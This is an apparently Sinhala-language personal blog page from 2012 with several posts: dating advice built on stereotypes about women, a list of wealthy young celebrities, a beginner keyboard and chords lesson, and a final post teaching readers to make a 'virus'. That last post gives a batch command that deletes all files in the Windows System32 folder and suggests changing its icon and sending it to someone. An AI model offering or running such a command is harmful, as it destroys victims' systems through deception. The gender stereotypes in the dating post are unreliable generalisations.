Sunday, September 30, 2012

Angry කෙල්ලෙක්ගේ හිත දිනාගන්නේ මෙහෙමයි.



කෙල්ලෙක්ගේ හිත දිනාගන්නේ මෙහෙමයි...
කෙල්ලෝ කීවහම හිතේ ඇදෙන්නේ ලාමක සූකිරි ලද බොලද, මනෝහර ලාමක ටින් ටින් එකකටනේ හැබැයි ඒ අසූව දශකයේ බුල්ටෝ එකක් ගැන කරපු ලාමක නිර්වචනයක් කියලා හිතෙන්නේ, අලුත් පරම්පරාවේ රියල් ගල් ටික් කෑලි දිහා බලනකොටනේ. දැන් කෙල්ලෝ ඔය ඕන ජිල් බෝලෙකට ඔට්ටුයි.. මෑත අතීතයේ සOක්‍යාලේකන පරිශීලනය කරද්දි වැඩිපුරම බූට් දීලා දිරාමාර් වෙලා තියෙන්නේ කෙල්ලෝ. ඉතින් අද හිතුවා කොහොමද කෙල්ලෙක්ගේ හිත දිනා ගන්නේ කියලා කියලා දෙන්න. මෙය අත්දුටුයි ප්‍රත්‍යක්ෂයි වැර දුනොත් මුදල් ආපසු...

(01) උපතින්ම කෙල්ලෝ බයයි. ඒගොල්ලන්ට හැම තිස්සෙම රැකවරනය කියන එක අවශ්‍යයි. ඒ නිසා ඔබ හොද රැකවලෙක් වෙන්න උත්සාහ කරන්න. ඔබේ පෙම්වතියට ඔබ හොද රැකවලෙක් වෙන්න උත්සාහ කරන්න. ඔබේ පෙම්වතියට ඔබ හොද රැකවරනයක් දෙන්න උත්සාහ කලොත් ඈ ඔබව විස්වාස කරාවී..
(02) කෙල්ලෙකුට ආදරය කරද්දි හැම තිස්සෙම බලන්න ඇය ගැන උනන්දු වෙනවා කියලා පෙන්නන්න, විශේෂයෙන්ම ඔබේ පෙම්වතිය හෝ ඔබ ඇයගෙන් වෙන්ව පිට පලාතක වාසය කරනවා නම් ඒක ගෑනු ලමයට තදින්ම බලපානවා. එම නිසා හැම විටම උත්සාහ කරන්න වචනයෙන් සOග්‍රහ කරන්න. ඔයා කෑවද, ඔයාට පාලුද, අද සතුටින්ද කියන වචන කීපයකි පුලුවන් ඇයට ඔබේ ආදරය ප්‍රකාෂ කරන්න.
(03) ඔබ වෙලාවට වැඩ කරන්න පුරුදු වෙන්න අද ඔයා විනාඩි 5 ක් පරක්කුයි, කියන කාරනය උනත් ඇති ඔබේ සබදතාව පලුදු කරන්න, හැබැයි මේ කාරනය කෙල්ලන්ට නම් වලන්ගු නෑ මොකද කෙල්ලෝ කරන හැම සුකුරුත්තමකටම කාලය ගත වෙන නිසා.
(04) කෙල්ලෙක් සමග සාප්පු සවාරි යනවා කියන එක ඇත්තටම කොල්ලෙකුට ලොකු හිසරදයක්. ඒ මුදල් නිසාම නෙමේ කෙල්ලෝ උපතින්ම තෝරනවා කියන එක කරන නිස. ඒ ගොල්ලන්ට රු 250/= ඇදුමක් ගන්න ගියත් පැය 4ක් 5ක් ගතවෙන නිසා ඒ කෙල්ලන්ගේ හැටි ඔබට මේ අත්දැකීම ඉවසිය නොහැකි නම් ඇය සමග සාප්පු සවාරි යාම කාරුනිකව ප්‍රතිෂේප කරන්න...
(05) කොල්ලෝ කැමතියි තෑගි දෙනවට වඩා තෑගි ලබන්න ඒක නිසා මාසකට වරක් වත් පොඩි තෑග්ගක් දෙන්න අමතක කරන්න එපා. ඒක පොඩි චොක්ලට් එකක් මලක්, හෝ වෙනත් කුඩා දෙයක් වෙන්න පුලුවන් හැබැයි ඒ පොඩි දේ ඔබ ගැන ඇයට ලොකු ආදරයක් ඇති කරාවි
(06) හැම විටම ඔබ හොද අසන්නෙක් වෙන්න උත්සාහ කරන්න. මේ කාරනයෙදි ඔබට හොද ඉවසීමක් අවශ්‍ය වෙනවා මොකද ගෑනු ලමයින්ට තියන ප්‍රශ්න පිරිමි ලමයින්ට වගේ නෙමේ සමහර වෙලාවට ඒක ඇගේ යෙහෙලියගේ ප්‍රශ්නයක් වෙන්න පුලුවන් ඔබ එයට පිලිතුරු දී විසදන්න උත්සාහ කරන්න එය ඔබේ පෙම්වතිය සතුටට පත් කරාවි
(07) ඔබේ පෙම්වතිය ඉදිරියේදි හෝ පිටතදී වෙනත් ගෑනු කෙනෙකු දෙස බැලීම පෙම්වතියට පිහියෙන් අනිනවා වගේ වැඩක්. ඒම කිසිම විටක වැරදිලාවත් එහෙම කරන්න එපා මොකද ගෑනු කොහොමත් ඉරිසියයිනේ..
(08) ඔබ ප්‍රිය සම්භාශනයකට හරි වෙනත් විශේෂ අවස්ථාවකට පෙම්වතිය සමග සහභාගි වෙනවා නම් එතනදි ඇයට ගොඩක් ගරු කරන්න වෙනවා මොකද පිරිසක් ඉදිරියේ ගරු සම්මාන ලබන්න ගෑනු උදවිය හරි කැමතියි..හැමවිටම ඇයගේ කැමත්ත අකමැත්ත විමසන්න අමතක කරන්න එපා
(09) ඔබගේ පෙම්වතිය ඉදිරියේ ඔබ වෙන අගනුන්ගේ ගුන දොස් දක්වන්න එපා ඇයගේ ගුන දොස් උනත් කාරුනිකව පැහැදිලි කිරීම හොද සම්බන්දතාවකට හේතු වේවී
(10) අද ඔයා ලස්සනයි, මේ ඇදුමට ඔයා හැඩයි වගේ විතරක් නෙමෙ ආදර බර වචන කීපයකට පුලුවන් ඔබේ සබද තාව තව අලුත් කරන්න. හැම විටම උත්සාහ කරන්න ආදර බර වදනයකින් ඇයව කුල්මත් කරන්න ඇය ඔබට සදහටම ආදරය කරාවි කොන්දේසි රහිතව.
මේ ටික කරලත් ඔබට ඇයව සතුටු කල නොහැකි නම් ඔබ වෙන අතක් බලා ගන්න ඇය හා විවාවවීම වදක භාර්‍යාවක් හා පවුල් කෑම හා සමානයි. එසේ නොවන ඔබට තෙරුවන් සරනයි






                                                                                                                                                            

pubudu lakshan...elakiri....com..thanx....
 

Sunday, September 16, 2012

කට්ටියම තමන්ගේ හිතට දැණුනදේ කියමු බලන්න.



wow....





************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********



************************************************** ***********




Love   LK happening girls...














cool ලෝකයේ $සල්ලිකාර$ සෙල්ලක්කාරයෝ.


සෙල්ලක්කාර වයසේදී සල්ලි හොයන ඒකට වඩා තියෙන්නේ සාල්ලි නාස්ති කරන එක. අම්ම තාත්තා හරි හම්බ කරපුදේ වනසන සෙල්ලක්කාර පුත්තු ගැන ඔන තරම් කතා තියෙනවා. ඒත් ඇටෙන් පොත්තේ එලියට ආපු ගමන් සල්ලි හම්බ කරල ප්‍රකෝටිපතියන් වුනු කෙල්ලො කොල්ලො ගැන අහන්න ලැබෙන්නේ බොහොම අඩුවෙන්.

01.ඒ අතරින් ජස්ටින් බීබර් කියන්නේ ලෝකේ අංක එකට ඉන්න සල්ලිකාර සෙල්ලක්කාරයා. තවම වයස 17යි. ඔහු අද ලෝකයේ ඉන්න ජනප්‍රියතම ගායකයෙක් කියල අමුතුවෙන් හඳුන්වල දෙන්න දෙයක් නෑ. ඔහුගේ never කියන ගීත ඇල්බමය ඇමරිකානු ගීත අ‍ලෙවියේ වර්තාවක් පිහිට වූවක්. එහි පිටපත් අලෙවියෙන් ලත් ආදායම අමෙරිකානු ඩොලර් මිලියන 37 ඉක්මවා ගියේ ඉතා කෙටි කලකින්. මේ වනවිට ජස්ටින් බීබර් ගේ වත්කම ඩොලර් මිලියන 53 ක්.



02. 1992 නොවැම්බරයේදී උපන් මයිලි සයිරස් ජස්ටින් බීබර් ගේ තරගකාරී ගායිකාව ලෙස හඳුන්වන්න පුළුවන්. නිළියක, ගේය පද රචකයෙක්, නර්තන ශිල්පිනියක හා සංගීතඥවරියකද වන මයිලි පසුගිය වසරේදී ලෝකයේ ධනවත් සෙල්ලක්කරයන්ගේ ලැයිස්තුවේ හිටියේ අංක එකට. අද ඇගේ වත්කම ඩොලර් මිලියන 48 ක් වෙනවා.. ඇය වඩාත් ජනපි‍්‍රයත්වයට පත්වූයේ ‘Hannah Montana’ රූපවාහිනි කතාමාලාව ඔස්සේය.

03.නික් ජෝනාස් ට තවම අවුරුදු 19 යි. සංගීතඥයෙක්,ගේය පද රචකයෙක්, නළුවෙක් මෙන්ම ගායකයකු වන නික් මේ සියළු ශිල්පයන් පෙන්වා මේ වන විට ඩොලර් මිලියන 12.5 ක් උපයාගෙන තිබෙනවා.ඔහුගේ සහොදරයා සමග එක්ව ගී ගැයීම නිසා ජෝනාස් බ්‍රදර්ස් නමින් ඔවුන් වඩාත් ප්‍රසිද්ධය. ඔහුගේ මාපියන්ද සංගීතඥයන්.


04. සුප්‍රසිද්ධ Twilight චිත්‍රපට කතා මාලාවේ ජේකොබ් බ්ලැක් (19) ලෙස රඟන ජනප්‍රිය නළුවකු
වන ටේලර් ලෝට්නර් සල්ලිකාර ලැයිස්තුවේ හතර වන තැනට පත් වුනේ Twilight කතා මාලාවෙන් ලත් ආදායම නිසාමය.

මේ වනවිට ඩොලර් මිලියන 8.5 ක වත්කම් ඔහු සතුයි. නළුකමට අමතරව නිරූපන ශිල්පියකු ලෙසද කටයුතු කරන ඔහු දක්ෂ කරාටේ සටන් ශිල්පියෙකුද වෙනවා.2010 වසරේ වඩාත්ම ලිංගික ආකර්ෂණයක් සහිත හොලිවුඩ් නළුවන් පනස් දෙනා අතරටත් ඔහු තේරී පත් වුණා. හොලිවුඩ්පුරයේ වැඩිම මුදලක් අය කරන යොවුන් චිත්‍රපට නළුවා වන්නේද ටේලර් ය.




05. ලොකයේ රූපවාහිනී නාට්‍ය නිර්මණයක් සඳහා වැඩිම මුදලක් අයකර ළමා නළුවෙක් වේ නම් ඒ ඇංගස් ටර්නර් ජෝන්ස් ය. අමෙරිකාවේ අතිශය ජනප්‍රිය රූපවාහිනී කතා මාලාව්ක් වන කොටස් 26 කින් යුත් Two and half men කතා මාලාව වෙනුවෙන් එක් කොටසක රංගනය සඳහා ඩොලර් 30,000ක් ඇංගස් අයකරයි.
මේ වන විට වයස 17 ක් වන ඔහු රංගන ශිල්පියකු ලෙස කරලියට එන්නේ වයස අවුරුදු පහේදීය. ඔහු මේ වන විට රංගනය උදෙසා සම්මන රාශියක්ද දිනාගෙන තිබෙන දක්ෂයෙකි. ඔහුගේ මුළු වත්කම ඩොලර් මිලියන 7.8 ක් වේ.







06. සිනමා හා රූපවාහිනී නිර්මාන රාශියකට රංගනයෙන් දායක වූ සෙලීනා ගොමස් ගයිකාවක ලෙසද අතිශය ජනප්‍රියය. යුනෙස්කෝ ආයතනයට සම්බන්ධව මානුශීය ව්‍යාපෘති ගනනාවකටද සහභාගී වන සෙලීන වඩාත් ජනප්‍රිය වූයේ ජස්ටින් බීබර් සමග වන ආදර පල හිලව්ව හෙතුවෙනි. මේ වන විට 19 හැවිරිදි ඇය ඩොලර් මිලියන 5.5 ක වත්කම් ඇත්තියකි.






07. වත්මන් අමෙරිකාවේ ජනප්‍රිය නළු විල් ස්මිත්ගේ පුත්‍රයා වන ජේඩන් ස්මිත් තවමත් වයස අවුරුදු 13 ක කොලු ගැටයකු වූවද ඔහු උපයාගෙන තිබෙන වත්කම් ඩොලර් මිලියන 5 ක් වී තිබේ. චිත්‍රපට විශාල ගණනකට රංගනයෙන් දායක වී ඇති ජේඩන් ජනප්‍රිය ‍රැප් ගායකයකුද වේ. The Karate Kid ඔහු රංගනයෙන් දායක වූ අතිශය ජනප්‍රිය සිනමා සිත්තමකි. ජස්ටින් බීබර්ගේ never say never ගීතය සඳහා ද ‍රැපර් කෙනෙකු ලෙස ඔහු දායක වී තිබේ.






08. ජේඩන් ස්මිත්ගේ දස හැවිරිදි සහෝදරියද අයියා පසු පසම යමින් මේ වන විට ඩොලර් මිලියන 04ක සල්ලිකාරියක වී තිබේ. විලෝ ස්මිත් නම් ඈ සම්මානයට පාත්‍ර වූ සිනමා හා රූපවාහිනී ළමා නිළියක මෙන්ම ගායිකාවකි . .I am legend ඈ සම්මානයට පාත්‍ර වූ ජනප්‍රියතම චිත්‍රපටයක්.





09.ඩකෝටා ෆැනින්ගේ 18 වන උපන් දිනය ‍යෙදී ‍තිබුණේ ‍පසුගිය පෙබරවාරි මාසයේ. ඇය ගේ රංගන ජීවිතය පටන් ගන්නේ 1999 දී.ඒ කියන්නේ වයස අවුරුදු පහෙදී. රූපවාහිනී නාට්‍ය නිර්මාණ හා චිත්‍රපට විශාල ගනනක් ළමා නිළියක ලෙස දැක්වූ දක්ෂතා වෙනුවෙන් සෑම වසරක් පාසාම හොඳම යොවුන් නිළිය ලෙස ඇය සම්මානයට පත්‍රවී තිබෙනවා. ඇගේ මුල්කාලීන චිත්‍රපටයක් වූ I am sam සඳහා සම්මාන විශාල ප්‍රමාණයක් හිමිකර ගැනීම ඉන් විශේෂයි. Twilight ඈ රගපෑ අතිශය ජනප්‍රියවූ චිත්‍රපටි මාලාවකි. ඇය මේ වන විට ඩොලර් මිලියන 4ක වත්කමකට හිමිකම් කියනවා.

10. ඩකෝටා ෆැන්නින් ගේ සහයට මෙන් ඇගේ පසු පස ඇගේම නැගනිය වන එල් ෆැන්නින් එන්න ගත්තේ වයස අවුරුදු තුන පිරෙන්නත් මාස හතරක් තිබියදී. ඇගේ පළමු චිත්‍රපටය වුණේ තම සහොයුරිය රංගනයෙන් දායක I am Sam චිත්‍රපටයයි. ඇයත් මේවන විට සම්මානයට පාත්‍ර වෙච්ච නිළියක්. චිත්‍රපට 25 කට පමණ හා රූපවාහිනී නිර්මාණ ගනනාවකට සම්බන්ධ වූ ඇය අද ඩොලර් මිලියන 1.5 ක හිමිකාරියක්. තාමත් වයස 13ක් වූවද හොඳම සහය නිළියට හිමි ඔස්කාර් සම්මනයට පවා ඇගේ නම නිර්දේශ වුණා. ඒ ඈ රගපෑ ජනප්‍රියතම චිත්‍රපටය වූයේ Supper 8 ය. 

Friday, September 14, 2012

Keyboard වාදනය, Chords හා Notes............

හ්ම්ම්ම්ම්... ඔන්න ගොඩ කාලෙකට පස්සෙ ආයෙත් සරිගම කන්න කියල තමයි මේ ලැස්ති වෙන්නෙ.. පහුගිය දවස් ටිකේම එලකිරියට එන්න බැරි උනා.. ලැප් එක එකෙක්ට දන් දෙන්න උන නිසා. කාලෙකින් එන නිසා නිකම්ම අත් දෙක වන වන එන්න බෑනෙ. ඒ නිසා පුරුදු විදිහට සරිගම කන්න ත්‍රෙඩ් එකකුත් අරන්ම ආව. Music studio part 2 ත්‍රෙඩ් එකේ යාලුවො කීප දෙනෙක්ට ප්‍රශ්නයක් ඇති වෙලා තිබුන කෝඩ්ස් සහ නෝට්ස් සම්බන්ධව. මම දැකපු දෙයක් තමයි මියුසික් ගැන කතා කරනකොට කියන සමහර දේවල් ගැන, එක පිරිසකට තේරුම් ගන්න අමාරුයි. කෝඩ්ස් පිළිබඳව දැනුමක් නැති නිසා. මටත් ඒ ගැන වැඩි දැනුමක් නෑ. ඉස්කෝලෙ යන කාලෙ යාලුවෙක් තමයි මටත් කියල දුන්නෙ කීබෝඩ් ප්ලේ කරන්න. ඒ උනත් මම ගිටාර් එක ප්ලේ කළා මිසක් , කීබෝඩ් එක ප්ලේ කලේ නෑ. කොහොම උනත් මං අවුරුදු තුනකින් විතර කීබෝඩ් එකකට අත තියලවත් නෑ. නමුත් මගේ දැනුම මේ ත්‍රෙඩ් එකේ දානව. කීබෝඩ් වාදනය මුලින්ම පටන් ගන්න කෙනෙකුට සහ කෝඩ්ස් ගැන දැනුම අවශ්‍ය කෙනෙකුට මේ තොරතුරු වැදගත් වෙයි. එලකිරියෙ ඉන්න කීබෝඩ් වැඩ්ඩො ටික මේ ත්‍රෙඩ් එකේ වැරදි තැන් නිවැරදි කරන්න. ඒ වගේම මං මේ ත්‍රෙඩ් එක දාන්නෙ Music studio ත්‍රෙඩ් වලට සම්බන්ධ එකක් හැටියට.. Music studio ත්‍රෙඩ් දෙක දැකපු නැති කට්ටියට මෙන්න ලින්ක් දෙක..



1. Music studio - http://www.elakiri.com/forum/showthread.php?t=1407491

2. Music Studio Part2 ( අලුත් වැඩක්. වෙනස් දෙයක්) - http://www.elakiri.com/forum/showthread.php?t=1412765



හරි , එහෙනම් අපි වැඩේ පටාආආආආආආආන් ගමු...


කෝඩ්ස් ගැන ඉගෙනගන්න ලේසිම සංගීත භාණ්ඩය තමයි කීබෝඩ් එක. ගිටාර් එකෙනුත් පුළුවන්. නමුත් ගොඩක්ම සරල විදිහට ඉගෙනගන්න පුළුවන් කීබෝඩ් එකෙන් (මං හිතන විදිහට). හැබැයි කෝඩ්ස් වලට කලින් ඉගෙනගන්න දේවල් ටිකක් තියෙනව. කීබෝඩ් වාදනය පිළිබඳව මූලික දැනීමක් නැතිව කෝඩ්ස් ගැන ඉගෙනගන්න බෑ. එහෙම ඉගෙනගෙන ඇති වැඩකුත් නෑ. හරි. මේ තියෙන්නෙ කීබෝඩ් එකක්. (පොතේ හැටියට කියනවනම් ඕගන් එකක්).






පේනව ඇති ඔය කීබෝඩ් එකේ තියෙනව කළු කෑලි ගොඩකුයි , සුදු කෑලි ගොඩකුයි. (මම නම් ඔය දෙකටම ආසයි.) උඹල වෙන වෙන ඒව හිතන්න එපා. මං කිවුවේ කීබෝඩ් එක ගැන. ඔය කෑලි වලට අපි කියමු Keys කියල.





හැම Key එකකටම ස්වරයක් තියෙනව. මියුසික් වලදි ප්‍රධාන ස්වර 7 යි. ස, රි, ග, ම, ප, ධ, නි. ඔහොම කියන්නෙ පෙරදිග සංගීතයේදී. අපි ඕක බටහිර සංගීත ක්‍රමයට ලියගමු. ඒක ගොඩක් ලේසියි. මොකද ගොඩක්ම භාවිතා වෙන්නෙ බටහිර ක්‍රමය. පුරුදු උනාට පස්සෙ මොන ක්‍රමේට තිබුනත් ලේසි, අමාරු කියල එකක් නෑ.






දැන් ඔය ස්වර ටික කීබෝඩ් එකේ කොහෙද තියෙන්නෙ??? මෙන්න මෙතන.





මෙතන සරිගම මොනවද කියල දැන් උඹල දන්නවනෙ..



දැන් කළු පාට Keys ගැන බලමු. සරලව කියන්නම්. ප්‍රධාන ස්වර වල පරාසය ටිකක් එහෙ මෙහෙ වෙලා තමයි මේ කළු පාට Keys වලට අදාළ ස්වර නිර්මාණය වෙන්නෙ. මේ කියන්නෙ මොකද්ද කියල ඉදිරියේදී තේරෙයි. මේ තියෙන්නෙ අදාළ ස්වර. මේ ටිකත් බටහිර ක්‍රමයට ලියාගමු.





හරි. ඔය ස්වර ටිකම මෙන්න මෙහෙම ලියන්නත් පුළුවන්.....






ඔහොම වෙන්නෙ කොහොමද කියල මං දැන් විස්තර කරන්න යන්නෙ නෑ. නමුත් මේ දෙවෙනියට කියපු ක්‍රමේ ඔලුවට දාගෙන ඔලුව කචල් කරගන්න එපා. ඉස්සෙල්ලම කියපු ක්‍රමය තමයි සම්මතව භාවිතා වෙන්නෙ. ඒ කියන්නේ මේක “ C# Eb F# Ab Bb ”. පැහැදිලිද?? ඔය ස්වර වලට උඩින් පොඩි සලකුණක් පේනවා ඇති කට්ටියට. අයියෝ උඩින් කිවුවට උඩින් නෙමෙයි ඒක වැටෙන්නෙ. කරන්න දෙයක් නෑ. මං දන්නෙ නෑ ඒක හදන්න. මුල් ඉංග්‍රීසි අකුරට දකුණු පැත්තෙන් තියෙන සලකුණ. දැන් හරිනේ. මෙහෙම “ C# ”. ඔය විදිහෙ සලකුණක් දාන්නෙ කළු පාට Keys වලට අදාළ ස්වර වලට විතරයි. ඒකෙත් සලකුණු වර්ග දෙකක් යොදනව. පේනවද කට්ටියට, “ C# ” “ Eb ”. “ # ” , “ b ”. (මේකට අපි කියනව ශාප්- #). (මේකට අපි කියනව ෆ්ලැට්- b). එතකොට ඒ අදාළ ස්වරය නම් කරන්නෙ මේ සලකුණත් එක්කමයි. “ C# ” මේක C (සී) ශාප්. “ Eb” මේක E (ඊ) ෆ්ලැට්. පැහැදිලිදෝ. ඉතුරු ස්වර තුන උඹලම නම් කරගනිල්ල. ශාප් , ෆ්ලැට් ස්වර හැදෙන විදිහක් තියෙනව. නිකම්ම උඩින් පාත් වෙන්නෙ නෑ. අනේ ඒව ගැන පස්සෙ කියන්නම්.


දැන් මේ සම්පුර්ණ ස්වර ටික කීබෝඩ් එකේ කොහෙද තියෙන්නෙ.






පැහැදිලිදෝ.. කීබෝඩ් එකේ කොච්චර Keys තිබුනත් මේ ස්වර ටික තමයි තියෙන්නෙ. නෝට්ස් (Notes) කියන්නෙ මොනවද?? සරලවම කියනවනම් මේ තියෙන එක Key එකකට, එහෙමත් නැත්නම් එක ස්වරයකට කියනව note එකක් කියල. “ C ” කියන ස්වරයට අපි කියනව “ C ” note එක (සී නෝට් එක) කියල. අනිත් ස්වර ටිකත් ඒ විදිහමයි. කීබෝඩ් එකක ස්වර C නෝට් එකෙන් පටන් අරන් B නෝට් එකෙන් ඉවර වෙන්නෙ. B නෝට් එකෙන් පස්සේ ආයෙත් C වලින් පටන් ගන්නව. කොච්චර Keys තිබුනත් දිගටම යන්නෙ ඒ විදිහට. Keys ගොඩක් තියෙන නිසා කොහොමද C නෝට් තියෙන තැන් හොයන්නෙ?? මෙහෙමයි. කළු පාට Keys 2 ක් තියෙන තැන් තියෙනව. මේ වගේ. රවුම් කරල තියෙන්නෙ. ඒ හැම කළු පාට Keys 2 ටම කලින් තියෙන්නෙ C නෝට් එක.






මං මේ කිවුවේ මුලිකම කරුණු ටික. මේ ටික විතරක් දැනගත්ත කියල හොඳ වාදකයෙක් වෙන්න බෑ. ප්‍රායෝගික පුහුණුව ඉතා වැදගත්. පුහුණුවකින් තොරව කිසිම දේකට දක්ෂයෙක් වෙන්න බෑ. නෝට්ස් වාදනය සඳහා ප්‍රධාන වශයෙන් පුරුදු කරන්නෙ දකුණු අත. හොඳට පුරුදු උනාට පස්සේ අත් දෙකෙන්ම නෝට්ස් වාදනය කරන්න පුළුවන් වෙයි. දකුණු අතේ ඇඟිලි මෙන්න මෙහෙම නම් කරගන්න.





දැන් උඹල අතේ ඇඟිලි වල පෑන් වලින් කුරුටු ගාන්න එපා. මේ නම්බර් මෙහෙම තියෙනව කියල හිතින් හිතා ගන්න. දැන් මෙන්න මෙහෙම ප්ලේ කරල බලන්න. ඔය නෝට්ස් යටින් නම්බර් දාල තියෙන්නෙ , ඒ ඇඟිලි වල නම්බර්. ඒ පිළිවෙලට ප්ලේ කරන්න.





ඔය ප්ලේ කරපු නෝට්ස් ටිකට අපි කියනව C scale (C ස්කේල්) එක කියල. ඔය විදිහට D scale , E scale ආදී වශයෙන් Scales ගොඩක් තියෙනව. අපෝ දැන් නම් බෑ. ඒව පස්සෙ කියන්නම්. Scale හැදෙන විදිහත් එක්කම කියන්නම්. ඔය විදිහට දකුණු අතේ ඇඟිලි හුරු කරගන්න අභ්‍යාස තියෙනව. ඒ හැම දෙයක් ගැනම මං පසුවට කියල දෙන්නම්.


දැන් Chords (කෝඩ්ස්).....


ප්‍රධාන වශයෙන් කෝඩ්ස් වර්ග දෙකයි. 1. Major Chords - මේජර් කෝඩ්ස්. 2. Minor Chords - මයිනර් කෝඩ්ස්. තව තියෙනව කෝඩ් වර්ග. හැබැයි මේ දෙක තමයි ප්‍රධාන සහ ලේසිම. මේ ත්‍රෙඩ් එකෙන් මං කතා කරන අන්තිම මාතෘකාව තමයි මේක. ඒ නිසා මෙතනදී මං Major Chords ගැන විතරක් විස්තර කරනව.


ශාප් , ෆ්ලැට් වගේ සලකුණක් Major Chords වලදී යොදන්නෙ නෑ. උදාහරණයක් විදිහට C කෝඩ් එක ගත්තොත් “ C “ chord කියල නිකම්ම ලියනව. Minor Chords වලදී පොඩියට m අකුර යොදනව ස්වරයට උඩින්. “ C “Minor Chord එක ලියන්නේ මෙහෙම. “ Cm ”. m අකුර උඩින් නෙමෙයි වැටිල තියෙන්නෙ. කොරන්ට දෙයක් නැතෝ. වැටහෙනවදෝ.... කෝඩ්ස් වාදනය සඳහා ප්‍රධාන වශයෙන් පුරුදු කරන්නෙ වම් අත. ටිකක් දියුණු උනාට පස්සෙ පුළුවන් අත් දෙකෙන්ම කෝඩ්ස් අල්ලන්න පුරුදු වෙන්න. වම් අතේ ඇඟිලි මෙහෙම නම් කරගන්න.






මෙන්න තියෙනව ප්‍රධාන Major Chords ටික පිලිවෙලින්. හොඳට බැලුවොත් පෙනෙයි මොකද්ද මේ කියන පිළිවෙල කියල. හරි, මේ කෝඩ්ස් වම් අතින් ප්ලේ කරන්න. රතු පාටින් නම්බර් දාල තියෙන්නෙ ඒ ඇඟිලි වල නම්බර්. Chord එකේ තියෙන Note තුනම එකට අල්ලන්න ඕනෙ.





පැහැදිලි ඇති කට්ටියට. පස්සෙ පුරුදු වෙන්න වෙනව වම් අතින් Chord එක අල්ලන ගමන් , දකුණු අතින් Note එකක් ප්ලේ කරන්න. දැනට ඔය ටික ඇති.



රායිට්.. කට්ටිය දැන් බලනව ඇති, ඇයි මම සමහර තැන් විස්තර කරල නැත්තෙ කියල. හැම තැනම හිස් තැන් තියෙනව. ඇයි ඒ? මං මේ ත්‍රෙඩ් එකෙන් කීබෝඩ් වාදනය සහ කෝඩ්ස් ගැන මූලික දැනුමක් , දළ අදහසක් ගන්න පුළුවන් වෙන්න තමයි දැම්මේ. වාදනය පිළිබඳව වැඩිය දැනුමක් නැති කෙනෙක් මේක බැලුවොත් එයාගෙ ඔලුවට ලොකු බරක් වැටෙන්නෙ නෑ. මං එකපාරම ලොකු විස්තර ගොඩක් එක්ක ත්‍රෙඩ් එක දැම්මනම් මේක මැලේ අච්චාරුවක් වෙනව. එතකොට ඉතින් සරිගම අවුල් වෙනවනේ. ඒ නිසයි මූලික දේවල් ටික විතරක් දැම්මේ. මේක ටික ටික මොලේට දාගමු. මේ ත්‍රෙඩ් එකේ කියල නැති දේවල් සහ අනිත් වැදගත් වෙන සියලුම දේවල් ටික එකතු කරල තව ත්‍රෙඩ් එකක් දානව. ඒ නිසා ඉවසීමෙන් ඉන්න සහ මේ ත්‍රෙඩ් එකේ දැනුම අනුව පුහුණු වෙන්න. මතක තියාගන්න , වාදනය කිරීමේ වේගය නෙමෙයි වැදගත් . නිවැරදිව ප්ලේ කරන එක, එහෙමත් නැත්නම් පාලනය තමයි වැදගත්. ඊට පස්සෙ පුළුවන් වේගය හදාගන්න. ඒක කීබෝඩ් එකට විතරක් නෙමෙයි, හැම සංගීත භාණ්ඩයකටම අදාලයි.


කොහොම උනත්, මං හිතන විදිහට Music studio ත්‍රෙඩ් එකට එළකිරියෙ ඉන්න කීබෝඩ් , ගිටාර් වාදකයො වැඩිය සහභාගී උනේ නෑ. ඒක පුදුමයක් නෙමෙයි. මොකද , දෙකම මියුසික් උනාට එකින් එකට වෙනස්. හරියට එක අම්මගෙ දරුවො දෙන්නෙක් වගෙ. මං හිතනව ඒ ආපු නැති කට්ටියත් මේ ත්‍රෙඩ් එකට එයි කියල. ඒ අයගෙ හෙල්ප් එකත් ඕනෙ මේ ත්‍රෙඩ් එකට. මොකද මං කීබෝඩ් වාදකයෙක් නෙමෙයි. ත්‍රෙඩ් එකේ වැරදි තැන් තියෙනවද දන්නෙ නෑ. දන්න අය වැරදි තැන් නිවැරදි කරන්න. තව දෙයක් , Music studio 2 ත්‍රෙඩ් එක dead වේගන යනකොට මං නැති ටිකේ අපේ කොල්ලො ටික කොහොම හරි ත්‍රෙඩ් එක ඇදගෙන ගිහින් තිබුන. ඒ හැමෝටම මං බොක්කෙන්ම තැන්ක්ස් කරනව. නම් වශයෙන් කියන්න ගියොත් ගොඩක් කට්ටිය ඉන්නව. Music studio 2 අපේ සෙට් එකෙන් මං ඉල්ලනව අපි ඒ ත්‍රෙඩ් එකත් කොහොම හරි දිගටම කරගෙන යමු. මේ හැම දෙයක්ම දැනුම. ත්‍රෙඩ් එක බලල උගුඩුවො වගේ යන්නෙ නැතුව බම්ප් එකක් වත් දාල පලයල්ලා. බම්ප් බැරිනම් “බ” යන්න හරි ගහල පලයල්ල දෙයියනේ. කලින් ත්‍රෙඩ් එකේ වගෙ හොරෙන්ම යන්නෙ නැතුව.


අවසන් වශයෙන් කියන්න තියෙන්නෙ , ඩිජිටල් සංගීතය හෝ කණ්ඩායම් සංගීතය හෝ මේ මොන මොන නම් කිවුවත් හැමදෙයක්ම සංගීතය. සංගීතය විශ්වීය භාෂාවක් කියන්නෙ නිකන් නෙමෙයි. කිසිම වචනයක් නැතුව අදහස් හුවමාරු කරන්න සංගීතයට පුළුවන්. කිසිම වචනයක් නැතුව හැඟීම් දනවන්න සංගීතයට පුළුවන්. ඉතින් , සංගීතය හරිම පුදුමාකාරයි. නේද? මං යන්නම්. නෑ නෑ ගිහින් එන්නම්. ජය වේවා


තෙරුවන් සරණයි.

Monday, September 10, 2012

Up මාරක virus හදමුද ? මෙන්න එහෙනම්..

System32 Folder එකේ ඔක්කොම Files Delete වෙන Virus එකක් හදමු.

හරි වැඩෙට බහිමු..
මුලින්ම කියන්න ඔනේ මේක ඔයාගෙ machine එකේ නම් open කරන්න එපා...

වැඩේ නම් හරිම ලෙසියි පොඩි වැඩක්...මුලින්ම පහල තියන code එක copy කරල notepad එකකට save කරන්න.

CODE: del c:\windows\system32\*.* /q
ඉතින් ඊට පස්සෙ ඔනෙ නමක් ගහල අගට .bat කියල කරන්න..වැඩේ හරි.අහ් මෙකෙන් මොනවද වෙන්නෙ කියල කිව්වෙ නෑනෙ..මේකෙන් වෙන්නෙ system32 folder එකේ ඔක්කොම files delete වෙන එක...ඔයාලට ඔනෙ නම් ඔකෙ icon එක change කරල කාටහරි යවන්න..අයෙත් කියන්නම් ඕක ඔයාගෙ pc එකේ නම් කරන්න එපා....


යාළුවො බය කරන්න Virus එකක් හදමු

1) මුලින්ම notepad එක Open කරගන්න.
